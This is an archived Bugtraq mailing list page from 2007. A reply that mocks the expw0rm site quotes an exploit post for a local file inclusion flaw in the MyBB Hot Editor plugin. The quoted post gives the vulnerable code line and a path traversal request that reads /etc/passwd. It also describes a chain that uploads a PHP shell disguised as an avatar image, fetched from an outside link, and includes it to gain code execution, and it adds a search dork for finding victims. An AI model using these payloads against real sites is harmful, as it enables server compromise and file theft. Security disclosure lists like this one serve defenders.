Bugtraq mailing list archives
Re: Mybb Hot Editor Plugin Local File Inclusion
From: "Kevin Finisterre (lists)" <kf_lists () digitalmunition com>
Date: Mon, 9 Apr 2007 13:08:18 -0400
expw0rm dude? That is a pretty weak attempt at mirroring milw0rm.com you pretty much copied str0kes layout except you added your own crappy colors. how nice of you.
-KF On Apr 9, 2007, at 9:40 AM, liz0 () expw0rm com wrote:
<?php /* Vendor : Liz0ziM Web : www.expw0rm.com Mail : liz0 () expw0rm com --------------------------------------- Vul. Code : keyboard.php line 3 require_once "./vk_code/$first"; ---------------------------------------- */http://victim.com/[path]/richedit/keyboard.php? first=../../../../../../../../../../../../../../../../../etc/passwdAnd upload php shell = > http://www.expw0rm.com/avatar_36.ziphttp://victim.com/[path]/richedit/keyboard.php?first=../../uploads/ avatars/avatar_36.gif => target isn't show with ie.plese you use firefoxDork: "MTR Paket :" ?> // Exploit Worm www.expw0rm.comorginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file- inclusion_no114.html
Current thread:
- Mybb Hot Editor Plugin Local File Inclusion liz0 (Apr 09)
- Re: Mybb Hot Editor Plugin Local File Inclusion Kevin Finisterre (lists) (Apr 09)
- <Possible follow-ups>
- Re: Re: Mybb Hot Editor Plugin Local File Inclusion liz0 (Apr 09)